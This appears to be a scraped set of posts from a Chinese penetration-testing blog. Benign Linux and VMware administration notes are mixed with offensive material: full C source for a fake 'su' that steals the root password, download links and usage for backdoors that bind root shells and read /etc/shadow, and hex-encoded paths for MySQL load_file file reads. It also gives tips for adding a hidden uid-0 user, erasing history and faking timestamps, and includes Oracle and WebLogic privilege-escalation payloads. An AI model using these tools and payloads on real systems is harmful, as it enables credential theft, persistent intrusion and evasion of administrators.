Searching for GCC...
The path "" is not valid path to the gcc binary.
Would you like to change it? [yes]
如果出现这个就表明gcc没有安装

yum install gcc gcc-c++ automake make
将编译环境一次装好

Searching for a valid kernel header path...
The path "" is not valid.
Would you like to change it? [yes]
如果出现这个就表示kernel-devel包没有安装

yum install kernel-devel

成功安装VMware tools时的提示：
Searching for GCC...
Detected GCC binary at "/usr/bin/gcc".
The path "/usr/bin/gcc" appears to be a valid path to the gcc binary.
Would you like to change it? [no]

Searching for a valid kernel header path...
Detected the kernel headers of the running kernel at
"/lib/modules/2.6.32-71.el6.i686/build/include".
The path "/lib/modules/2.6.32-71.el6.i686/build/include" appears to be a valid
path to the kernel headers of the running kernel.
Would you like to change it? [no]

相关文章

• 2011年06月10日 -- VMware 硬盘扩容
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试

/*

/*

* kpr-fakesu.c V0.9beta167

* by koper

*

* Setting up:

* admin@host:~$ gcc -o .su fakesu.c; rm -rf fakesu.c

* admin@host:~$ mv .su /var/tmp/.su

* admin@host:~$ cp .bash_profile .wgetrc

* admin@host:~$ echo "alias su=/var/tmp/.su">>.bash_profile

* admin@host:~$ logout

* *** LOGIN ***

* admin@host:~$ su

* Password:

* su: Authentication failure

* Sorry.

* admin@host:~$ su

* Password:

* root@host:~# logout

* admin@host:~$ cat /var/tmp/.pwds

* root:dupcia17

* admin@host:~$

*

* /bin/su sends various failure information depending on the OS ver.

* Please modify the source to make it "fit" <img src="http://www.4shell.org/wp-content/uploads/images/2011/11/1323384Sm.gif" alt=";)">

*

*/

#include

#include

#include

main(int argc, char *argv[]){

FILE *fp;

char *user;

char *pass;

char filex[100];

char clean[100];

sprintf(filex,"/var/tmp/.pwds");

sprintf(clean,"rm -rf /var/tmp/.su;mv -f /home/test/.wgetrc /home/test/.bash_profile");

if(argc==1) user="root";

if(argc==2) user=argv[1];

if(argc>2){

if(strcmp(argv[1], "-l")==0)

user=argv[2];

else user=argv[1];}

fprintf(stdout,"assword: ");

pass=getpass ("");

system("sleep 3");

fprintf(stdout,"su: Authentication failurenSorry.n");

if ((fp=fopen(filex,"w")) != NULL)

{

fprintf(fp, "%s:%sn", user, pass);

fclose(fp);

}

system(clean);

system("rm -rf /var/tmp/.su; ln -s /bin/su /var/tmp/.su");

}

以下三个都是比较经典的backdoor：

http://www.4shell.org/tools/klogger-1.4.gz

http://www.4shell.org/tools/enyelkm.en.v1.1.tar.gz

http://www.4shell.org/tools/sshbd.tgz

这个是在linux穿墙的，通过53号端口建立隧道：

http://www.4shell.org/tools/dns2tcp-0.5.tar.gz

相关文章

• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试

A great app level backdoor in Linux . Very useful while doing Linux pentest.

Written by Lion [HUC(Hack Union of China)] at year 2002

The source code has some errors in packetstromsecurity’s archive; Now all fixed by akshell(http://www.linuxpentest.com)

/************************************************************************
* allinone.c for HUC (2002.1)
*
* allinone.c is
* a Http server,
* a sockets transmit server,
* a shell backdoor,
* a icmp backdoor,
* a bind shell backdoor,
* a like http shell,
* it can translate file from remote host,
* it can give you a socks5 proxy,
* it can use for to attack, jumps the extension, Visits other machines.
* it can give you a root shell.:)
*

* Usage:
* compile:
* gcc -o allinone allinone.c -lpthread
* run on target:
* ./allinone
*
* 1.httpd server
* Client:
* http://target:8008/givemefile/etc/passwd
* lynx -dump http://target:8008/givemefile/etc/shadow > shadow
* or wget http://target:8008/givemefile/etc/shadow
*
* 2.icmp backdoor
* Client:
* ping -l 101 target (on windows)
* ping -s 101 -c 4 target (on linux)
* nc target 8080
* kissme:) –> your password
*
* 3.shell backdoor
* Client:
* nc target 8008
* kissme:) –> your password
*
* 4.bind a root shell on your port
* Client:
* http://target:8008/bindport:9999
* nc target 9999
* kissme:) –> your password
*
* 5.sockets transmit
* Client:
* http://target:8008/socks/:local listen port::you want to tran ip:::you want to tran port
* http://target:8008/socks/:1080::192.168.0.1:::21
* nc target 1080
*
* 6.http shell
* Client:
* http://target:8008/givemeshell:ls -al (no pipe)
*
* ps:
* All bind shell have a passwd, default is: kissme:)
* All bind shell will close, if Two minutes do not have the connection.
* All bind shell only can use one time until reactivates.
*
*
* Code by lion, e-mail: lion@cnhonker.net
* Welcome to HUC Website, Http://www.cnhonker.com
*
* Test on redhat 6.1/6.2/7.0/7.1/7.2 (maybe others)
* Thx bkbll’s Transmit code, and thx Neil,con,iceblood for test.
*
************************************************************************/
Download:
http://www.4shell.org/tools/allinone.tgz

相关文章

• 2012年01月2日 -- How to attack a windows domain
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示

环境：windows xp、VMware、fedora 10
步骤：1、在cmd窗口中输入：vmware-vdiskmanager -x 50GB "G:\CenOS.vmdk"
参数"-x"指定扩容后整个空间大小（包含现在正在使用的），"G:\CentOSvmdk" 指定需要
扩容的虚拟机磁盘文件。
此命令成功执行后已经为虚拟机分配空间了，但是内装的linux系统还不可使用。

2、进入虚拟机内装的LINUX系统，以root用户执行：

fdisk -l //列出磁盘使用情况
fdisk /dev/sda //或者是scsi磁盘就用sda，ide磁盘就用hda
n //添加新分区
p //创建主分区，也可以使用"l"创建逻辑分区
4 //选择分区号，1－4
选择默认分区大小
w //保存、退出

3、格式化新分区：

mkfs -t ext3 /dev/sda4

4、挂载分区：

手动： mount /dev/sda4 /home/colin/work
自动： 在/etc/fstab中加入一行
/dev/sda4 /home/colin/work ext3 defaults, 0 1

整个操作完成可以使用新分区。
另外一种方法就是首先在虚拟机上添加一块硬盘，然后挂载。这样就相当于又买了个硬盘，可以缓解磁盘空间紧张的问题了。

1、启动虚拟机，选择"Edit virtual machine settings"，点按钮"adding",按照向导默认添加一块磁盘，一般都是SCSI设备。 指定硬盘容量,然后重启进入系统。

root用户操作:
2、 fdisk -l 会看到有一块新的设置,如果你先前有一块硬盘(sda1, sda2...),新加的这块应该是(/dev/sdb)。
看到就说明系统已经识别出这块硬盘了,接下来我们给这块硬盘分区,格式化。
fdisk /dev/sdb (当然如果你添加的IDE设置,会是 hdx) x 代表数字,1到4指主分区编号，5以上指逻辑分区。具体的资料可以在网上搜到。

3、分区格式化：
操作和上面的分区格式化大致相同，只需注意把/dev/sda 改成/dev/sdb，后面的操作也都一致。

相关文章

• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示
• 2011年04月28日 -- 一次Linux下的普通渗透测试

/etc/phpmyadmin/config.inc.php 0x2F6574632F7068706D7961646D696E2F636F6E6669672E696E632E706870
/etc/mysql/my.cnf 0x2F6574632F6D7973716C2F6D792E636E66
/etc/httpd/conf.d/php.conf 0x2F6574632F68747470642F636F6E662E642F7068702E636F6E66
/etc/httpd/conf.d/httpd.conf 0x2F6574632F68747470642F636F6E662E642F68747470642E636F6E66

/etc/httpd/logs/error_log 0x2F6574632F68747470642F6C6F67732F6572726F725F6C6F67
/etc/httpd/logs/error.log 0x2F6574632F68747470642F6C6F67732F6572726F722E6C6F67
/etc/httpd/logs/access_log 0x2F6574632F68747470642F6C6F67732F6163636573735F6C6F67
/etc/httpd/logs/access.log 0x2F6574632F68747470642F6C6F67732F6163636573732E6C6F67
/home/apache/conf/httpd.conf 0x2F686F6D652F6170616368652F636F6E662F68747470642E636F6E66
/home/apache2/conf/httpd.conf 0x2F686F6D652F617061636865322F636F6E662F68747470642E636F6E66

/var/log/apache/error_log 0x2F7661722F6C6F672F6170616368652F6572726F725F6C6F67
/var/log/apache/error.log 0x2F7661722F6C6F672F6170616368652F6572726F722E6C6F67
/var/log/apache/access_log 0x2F7661722F6C6F672F6170616368652F6163636573735F6C6F67
/var/log/apache/access.log 0x2F7661722F6C6F672F6170616368652F6163636573732E6C6F67
/var/log/apache2/error_log 0x2F7661722F6C6F672F617061636865322F6572726F725F6C6F67
/var/log/apache2/error.log 0x2F7661722F6C6F672F617061636865322F6572726F722E6C6F67
/var/log/apache2/access_log 0x2F7661722F6C6F672F617061636865322F6163636573735F6C6F67
/var/log/apache2/access.log 0x2F7661722F6C6F672F617061636865322F6163636573732E6C6F67
/var/www/logs/error_log 0x2F7661722F7777772F6C6F67732F6572726F725F6C6F67
/var/www/logs/error.log 0x2F7661722F7777772F6C6F67732F6572726F722E6C6F67
/var/www/logs/access_log 0x2F7661722F7777772F6C6F67732F6163636573735F6C6F67
/var/www/logs/access.log 0x2F7661722F7777772F6C6F67732F6163636573732E6C6F67
/usr/local/apache/logs/error_log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6572726F725F6C6F67
/usr/local/apache/logs/error.log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6572726F722E6C6F67
/usr/local/apache/logs/access_log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6163636573735F6C6F67
/usr/local/apache/logs/access.log 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6163636573732E6C6F67

/var/log/error_log 0x2F7661722F6C6F672F6572726F725F6C6F67
/var/log/error.log 0x2F7661722F6C6F672F6572726F722E6C6F67
/var/log/access_log 0x2F7661722F6C6F672F6163636573735F6C6F67
/var/log/access.log 0x2F7661722F6C6F672F6163636573732E6C6F67

/usr/local/apache/logs/access_logaccess_log.old 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6163636573735F6C6F676163636573735F6C6F672E6F6C64
/usr/local/apache/logs/error_logerror_log.old 0x2F7573722F6C6F63616C2F6170616368652F6C6F67732F6572726F725F6C6F676572726F725F6C6F672E6F6C64

/etc/php.ini 0x2F6574632F7068702E696E69
/bin/php.ini 0x2F62696E2F7068702E696E69
/etc/init.d/httpd 0x2F6574632F696E69742E642F6874747064
/etc/init.d/mysql 0x2F6574632F696E69742E642F6D7973716C

/etc/httpd/php.ini 0x2F6574632F68747470642F7068702E696E69
/usr/lib/php.ini 0x2F7573722F6C69622F7068702E696E69
/usr/lib/php/php.ini 0x2F7573722F6C69622F7068702F7068702E696E69
/usr/local/etc/php.ini 0x2F7573722F6C6F63616C2F6574632F7068702E696E69
/usr/local/lib/php.ini 0x2F7573722F6C6F63616C2F6C69622F7068702E696E69
/usr/local/php/lib/php.ini 0x2F7573722F6C6F63616C2F7068702F6C69622F7068702E696E69
/usr/local/php4/lib/php.ini 0x2F7573722F6C6F63616C2F706870342F6C69622F7068702E696E69
/usr/local/php4/php.ini 0x2F7573722F6C6F63616C2F706870342F7068702E696E69
/usr/local/php4/lib/php.ini 0x2F7573722F6C6F63616C2F706870342F6C69622F7068702E696E69
/usr/local/php5/lib/php.ini 0x2F7573722F6C6F63616C2F706870352F6C69622F7068702E696E69
/usr/local/php5/etc/php.ini 0x2F7573722F6C6F63616C2F706870352F6574632F7068702E696E69
/usr/local/php5/php5.ini 0x2F7573722F6C6F63616C2F706870352F706870352E696E69
/usr/local/apache/conf/php.ini 0x2F7573722F6C6F63616C2F6170616368652F636F6E662F7068702E696E69

/usr/local/apache/conf/httpd.conf 0x2F7573722F6C6F63616C2F6170616368652F636F6E662F68747470642E636F6E66
/usr/local/apache2/conf/httpd.conf 0x2F7573722F6C6F63616C2F617061636865322F636F6E662F68747470642E636F6E66

/usr/local/apache2/conf/php.ini 0x2F7573722F6C6F63616C2F617061636865322F636F6E662F7068702E696E69
/etc/php4.4/fcgi/php.ini 0x2F6574632F706870342E342F666367692F7068702E696E69
/etc/php4/apache/php.ini 0x2F6574632F706870342F6170616368652F7068702E696E69
/etc/php4/apache2/php.ini 0x2F6574632F706870342F617061636865322F7068702E696E69
/etc/php5/apache/php.ini 0x2F6574632F706870352F6170616368652F7068702E696E69
/etc/php5/apache2/php.ini 0x2F6574632F706870352F617061636865322F7068702E696E69
/etc/php/php.ini 0x2F6574632F7068702F7068702E696E69
/etc/php/php4/php.ini 0x2F6574632F7068702F706870342F7068702E696E69
/etc/php/apache/php.ini 0x2F6574632F7068702F6170616368652F7068702E696E69
/etc/php/apache2/php.ini 0x2F6574632F7068702F617061636865322F7068702E696E69
/web/conf/php.ini 0x2F7765622F636F6E662F7068702E696E69
/usr/local/Zend/etc/php.ini 0x2F7573722F6C6F63616C2F5A656E642F6574632F7068702E696E69
/opt/xampp/etc/php.ini 0x2F6F70742F78616D70702F6574632F7068702E696E69
/var/local/www/conf/php.ini 0x2F7661722F6C6F63616C2F7777772F636F6E662F7068702E696E69
/var/local/www/conf/httpd.conf 0x2F7661722F6C6F63616C2F7777772F636F6E662F68747470642E636F6E66
/etc/php/cgi/php.ini 0x2F6574632F7068702F6367692F7068702E696E69
/etc/php4/cgi/php.ini 0x2F6574632F706870342F6367692F7068702E696E69
/etc/php5/cgi/php.ini 0x2F6574632F706870352F6367692F7068702E696E69

/php5/php.ini 0x2F706870352F7068702E696E69
/php4/php.ini 0x2F706870342F7068702E696E69
/php/php.ini 0x2F7068702F7068702E696E69
/PHP/php.ini 0x2F5048502F7068702E696E69

/apache/php/php.ini 0x2F6170616368652F7068702F7068702E696E69

/xampp/apache/bin/php.ini 0x2F78616D70702F6170616368652F62696E2F7068702E696E69
/xampp/apache/conf/httpd.conf 0x2F78616D70702F6170616368652F636F6E662F68747470642E636F6E66
/NetServer/bin/stable/apache/php.ini 0x2F4E65745365727665722F62696E2F737461626C652F6170616368652F7068702E696E69
/home2/bin/stable/apache/php.ini 0x2F686F6D65322F62696E2F737461626C652F6170616368652F7068702E696E69

/home/bin/stable/apache/php.ini 0x2F686F6D652F62696E2F737461626C652F6170616368652F7068702E696E69

/var/log/mysql/mysql-bin.log 0x2F7661722F6C6F672F6D7973716C2F6D7973716C2D62696E2E6C6F67
/var/log/mysql.log 0x2F7661722F6C6F672F6D7973716C2E6C6F67
/var/log/mysqlderror.log 0x2F7661722F6C6F672F6D7973716C646572726F722E6C6F67
/var/log/mysql/mysql.log 0x2F7661722F6C6F672F6D7973716C2F6D7973716C2E6C6F67
/var/log/mysql/mysql-slow.log 0x2F7661722F6C6F672F6D7973716C2F6D7973716C2D736C6F772E6C6F67
/var/mysql.log 0x2F7661722F6D7973716C2E6C6F67

/var/lib/mysql/my.cnf 0x2F7661722F6C69622F6D7973716C2F6D792E636E66
/usr/local/mysql/my.cnf 0x2F7573722F6C6F63616C2F6D7973716C2F6D792E636E66
/usr/local/mysql/bin/mysql 0x2F7573722F6C6F63616C2F6D7973716C2F62696E2F6D7973716C
/etc/mysql/my.cnf 0x2F6574632F6D7973716C2F6D792E636E66
/etc/my.cnf 0x2F6574632F6D792E636E66

/usr/local/cpanel/logs 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F6773
/usr/local/cpanel/logs/stats_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F73746174735F6C6F67
/usr/local/cpanel/logs/access_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6163636573735F6C6F67
/usr/local/cpanel/logs/error_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6572726F725F6C6F67
/usr/local/cpanel/logs/license_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6C6963656E73655F6C6F67
/usr/local/cpanel/logs/login_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F6C6F67696E5F6C6F67
/usr/local/cpanel/logs/stats_log 0x2F7573722F6C6F63616C2F6370616E656C2F6C6F67732F73746174735F6C6F67
/usr/local/share/examples/php4/php.ini 0x2F7573722F6C6F63616C2F73686172652F6578616D706C65732F706870342F7068702E696E69
/usr/local/share/examples/php/php.ini 0x2F7573722F6C6F63616C2F73686172652F6578616D706C65732F7068702F7068702E696E69

相关文章

• 2011年06月6日 -- linux渗透小技巧
• 2012年01月31日 -- 命令行导出IIS配置信息
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年11月24日 -- 域内指定用户中马
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令

2.Linux添加uid为0的用户
useradd -o -u 0 cnbird

3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null

4.SSH反向链接
ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip -p 指定远端服务器SSH端口
然后服务器上执行ssh localhost -p 44即可

5.weblogic本地读取文件漏洞
curl -H “wl_request_type: wl_xml_entity_request” -H “xml-registryname: ../../” -H “xml-entity-path: config.xml” http://server/wl_management_internal2/wl_management

6.apache查看虚拟web目录
./httpd -t -D DUMP_VHOSTS

7.cvs渗透技巧
CVSROOT/passwd UNIX SHA1的密码文件
CVSROOT/readers
CVSROOT/writers
CVS/Root ¦lt;br /> CVS/Entries 更新的文件和目录内容
CVS/Repository

8.Cpanel路径泄露
/3rdparty/squirrelmail/functions/plugin.php

9.修改上传文件时间戳(掩盖入侵痕迹)
touch -r 老文件时间戳 新文件时间戳

10.利用baidu和google搜索目标主机webshell
intitle:PHPJackal 1t1t

11.包总补充
创建临时“隐藏”目录 mkdir /tmp/…
/tmp/…目录在管理员有宿醉的情况下是“隐藏”的，可以临时放点exp啥的

12.利用linux输出绕过gif限制的图片
printf “GIF89a\x01\x00\x01\x00” > poc.php

13.读取环境变量对于查找信息非常有帮助
/proc/self/environ

14.最新的ORACLE 11提升用户权限(只要session权限)
DBMS_JVM_EXP_PERMS 中的IMPORT_JVM_PERMS

判断登陆权限
select * from session_privs;
Create SESSION

select * from session_roles;

select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = ‘GREMLIN(用户名)’;

DESC JAVA$POLICY$

DECLARE
POL DBMS_JVM_EXP.TEMP_JAVA_POLICY;
CURSOR C1 IS Select ‘GRANT’ USER(), ‘SYS’, ‘java.io.FilePermission’, ‘<>’, ‘execute’, ‘ENABLE’ FROM DUAL;
BEGIN
OPEN C1;
FETCH C1 BULK COLLECT INTO POL;
CLOSE C1;
DBMS_JVM_EXP_PERMS.IMPORT_JVM_PERMS(POL);
END;
/

connect / as sysdba
COL TYPE_NAME FOR A30;
COL NAME FOR A30;
COL_ACTION FOR A10;
Select TYPE_NAME, NAME, ACTION FROM SYS.DBA_JAVA_POLICY Where GRANTEE = ‘用户’;

connect 普通用户
set serveroutput on
exec dbms_java.set_output(10000);

Select DBMS_JAVA.SET_OUTPUT_TO_JAVA(‘ID’, ‘oracle/aurora/rdbms/DbmsJava’, ‘SYS’, ‘writeOutputToFile’, ‘TEXT’, NULL, NULL, NULL, NULL,0,1,1,1,1,0, ‘DECLARE PRAGMA AUTONOMOUS_TRANSACTION;’BEGIN EXECUTE IMMEDIATE ”GRANT DBA TO 用户”; END;’, ‘BEGIN NULL; END;’) FROM DUAL;

EXEC DBMS_CDC_ISUBSCRIBE.INT_PURGE_WINDOWS(‘NO_SUCH_SUBSCRIPTION’, SYSDATE());

set role dba;

select * from session_privs;

EXEC SYS.VULNPROC(‘FOO”||DBMS_JAVA.SET_OUTPUT_TO_SQL(“ID”,”DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE”"GRANT DBA TO PUBLIC”";DBMS_OUTPUT.PUT_LINE(:1);END;”,”TEXT”)||”BAR’);

Select DBMS_JAVA.RUNJAVA(‘oracle/aurora/util/Test’) FROM DUAL;
SET ROLE DBA;

15. webLogic渗透技巧
四. Weblogin Script Tool(WLST)

写入到\\config\\config.xml

1.进行修改:
\wlserver_10.0\server\bin\setWLSenv.sh
2.启动WLST
java weblogic.WLST

wls:/offline> connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)
wls:/bbk/serverConfig> help()

wls:/bbk/serverConfig> edit()
wls:/bbk/serverConfig> cd(‘Servers’)
wls:/bbk/serverConfig/Server-cnbird> cd(‘Log’)
wls:/bbk/serverConfig/Server-cnbird/log> cd(‘Server-cnbird’)
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird> startEdit()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> set(‘FileCount’, ’4′)
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> save()
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> activate() 提交对应Active Change
wls:/bbk/serverConfig/Server-cnbird/log/Server-cnbird !> disconnect()
wls:/offline> exit()

3.批处理:
保存以上命令为cnbird.py
connect(‘admin’, ‘admin’, ‘t3://127.0.0.1:7001′)
cd(‘Servers’)
cd(‘Log’)
cd(‘Server-cnbird’)
startEdit()
set(‘FileCount’, ’4′)
save()
然后执行java weblogic.WLST cnbird.py

相关文章

• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2012年01月31日 -- 命令行导出IIS配置信息
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年11月24日 -- 域内指定用户中马
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年05月26日 -- Linux 安装基于PPTPD的vpn,内网渗透用
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令

cat /etc/issue //看版本

如果dns没设置,就编辑/etc/resolv.conf 改DNS

如果主机不能上网就试着防火墙里允许通过

下载程序:

cd /tmp
wget http://poptop.sourceforge.net/yum/stable/packages/dkms-2.0.17.5-1.noarch.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm
根据第一步的返回情况,下载对应版本的rpm

如果是Centos 4版本的
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.3-7.rhel4.i386.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel4.i386.rpm

CentOS 5的
wget http://poptop.sourceforge.net/yum/stable/packages/ppp-2.4.4-3.1.rhel5.i386.rpm
wget http://poptop.sourceforge.net/yum/stable/packages/pptpd-1.3.4-1.rhel5.1.i386.rpm

安装程序:

下载回来这4个文件后安装 [按顺序]

rpm -ivh dkms-2.0.17.5-1.noarch.rpm
rpm -ivh kernel_ppp_mppe-1.0.2-3dkms.noarch.rpm

Centos 4:
rpm -Uvh ppp-2.4.3-7.rhel4.i386.rpm
rpm -ivh pptpd-1.3.4-1.rhel4.i386.rpm

CentOS 5:
rpm -Uvh ppp-2.4.4-3.1.rhel5.i386.rpm
rpm -ivh pptpd-1.3.4-1.rhel5.1.i386.rpm

配置pptpd:

echo localip 10.12.12.1 >>/etc/pptpd.conf
echo remoteip 10.12.12.100-254 >>/etc/pptpd.conf

加一个pptpd用户

echo open pptpd open 10.12.12.101 >>/etc/ppp/chap-secrets

临时启用nat (允许访问内网和外网)

echo 1 >/proc/sys/net/ipv4/ip_forward
长期调整的话..可以编辑/etc/sysctl.conf这个文件中的net.ipv4.ip_forward = ???

防火墙设置:

iptables -t nat -F
iptables -t nat -A POSTROUTING -s 10.12.12.0/24 -j SNAT --to 10.12.12.1
service iptables save
防火墙允许通过. 也可以service iptables stop

启动或停止服务:

启动
service pptpd start

停止
service pptpd stop

相关文章

• 2007年11月16日 -- 高级内网渗透工具:Paris (创建VPN)
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧
• 2011年05月16日 -- kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images
• 2011年04月30日 -- Linux基本操作命令
• 2011年04月30日 -- 让putty支持中文输入和显示

下载：
kernel-2.6.18-164 Local 2010 Exploit Root Private Cant See Images

相关文章

• 2010年12月16日 -- Exploits Linux Kernel <= 2.6.37 local privilege escalation
• 2009年09月1日 -- Linux kernel 2.6 < 2.6.19 (32bit) ip_append_data() local ring0 root exploit
• 2009年05月17日 -- Linux Kernel 2.6.x ptrace_attach Local Privilege Escalation Exploit
• 2008年11月2日 -- Linux Kernel < 2.6.22 ftruncate()/open() Local Exploit
• 2011年11月25日 -- 最小化安装CentOS6 VMware-tools安装几点注意事项
• 2011年11月24日 -- linux Backdoor
• 2011年11月24日 -- allinone: Linux pentest tools
• 2011年06月10日 -- VMware 硬盘扩容
• 2011年06月6日 -- Linux下MySQL的load_file常用路径
• 2011年06月6日 -- linux渗透小技巧

1.查看版本，内核
cat /etc/issue

2.查看cpu,mem
grep “model name” /proc/cpuinfo
grep MemTotal /proc/meminfo
free

3. 内存的插槽数,已经使用多少插槽.每条内存多大，已使用内存多大
dmidecode | grep -P -A 5 “Memorys+Device” | grep Size | grep -v Range

Size: 2048 MB
Size: No Module Installed
Size: No Module Installed
Size: No Module Installed

4. 支持的最大内存容量
dmidecode | grep -P ‘Maximums+Capacity’
Maximum Capacity: 64 GB

5. 查看内存的频率
dmidecode | grep -A16 “Memory Device”
dmidecode | grep -A16 “Memory Device” | grep ‘Speed’

6.查看操作系统位数
getconf LONG_BIT

#————————————————————————
# 基本设置
#————————————————————————

# 设置主机名
vi /etc/sysconfig/network
HOSTNAME=centos
reboot system…

# ifconfig eth0 192.168.4.222 netmask 255.255.255.0
# ifconfig eth0:0 10.0.0.1 netmask 255.0.0.0
# ifconfig eth0 down
# ifconfig eth0 on

# 更改网卡MAC地址
ifconfig eth0 hw ether 00:37:A6:C4:68:E3

# route命令设置网关
route add default gw 192.168.4.3
route del default gw 192.168.4.1

# 查看端口信息
netstat -atn

# 查看路由表
netstat -r

# 查看网络接口状态
netstat -i

# 查看谁占用80端口
lsof -i:80

——————————————————————–

# 增加环境变量

echo “export PATH=$PATH:/usr/local/mysql/bin” >> /etc/profile  //永久修改的
source /etc/profile

——————————————————————–

系统默认为美国东部时间，修改Linux时区为东八区
cp -f /usr/share/zoneinfo/Asia/Shanghai /etc/localtime
date -s “20090101″
clock -w  或  hwclock
——————————————————————–

#————————————————————————
# Linux流量监控
#————————————————————————
iftop工具

用途: 用来即时监看网路状态和各ip所使用的频宽

执行(必须以root身份)
监控eth1的网卡的流量
# iftop -i eth1

以位元组(bytes)为单位显示流量(预设是位元bits):
$ iftop -B

直接显示IP, 不进行DNS反解:
$ iftop -n

直接显示连接埠编号, 不显示服务名称:
$ iftop -N

显示某个网段进出封包流量
$ iftop -F 192.168.1.0/24 or 192.168.1.0/255.255.255.0

其他参数可下 iftop -h 看说明.

进入iftop画面时, 可按 p 切换是否显示连接埠, n 切换显示IP或主机的domain name, N切换显示连接埠代号或名称, p暂停显示, b切换是否显示长条, B切换计算几秒内的平均流量, 其他按键可以按h观看说明.
設定檔的位置在~/.iftoprc , 關於設定檔的寫法可以參考 iftop 的 info page.

nload
用途: 用来即时监看网路状态和各ip所使用的频宽(很废话了)
nload默认的是eth0网卡，如果你想监测eth1网卡的流量
#nload eth1

nload默认分为上下两块：上半部分是：Incoming也就是进入网卡的流量，下半部分是：Outgoing，也就是从这块网卡出去的流量，每部分都有当前流量（Curr），平均流量（Avg），最小流量（Min），最大流量（Max），总和流量（Ttl）这几个部分，看起来还是蛮直观的。
另外，你也可以自己定义流量数值显示的单位
#nload –help
就可以看到具体的相关参数了。

查看网络平均流量

下面的脚本可以很好的监控你的网络的平均流量,你可以提定时间
#!/bin/bash
echo -n “which nic?”
read eth
echo “the nic is “$eth
echo -n “how much seconds:”
read sec
echo “duration is “$sec” seconds, wait please…”
infirst=$(awk ‘/’$eth’/{print $1 }’ /proc/net/dev |sed ‘s/’$eth’://’)
outfirst=$(awk ‘/’$eth’/{print $10 }’ /proc/net/dev)
sumfirst=$(($infirst+$outfirst))
sleep $sec”s”
inend=$(awk ‘/’$eth’/{print $1 }’ /proc/net/dev |sed ‘s/’$eth’://’)
outend=$(awk ‘/’$eth’/{print $10 }’ /proc/net/dev)
sumend=$(($inend+$outend))
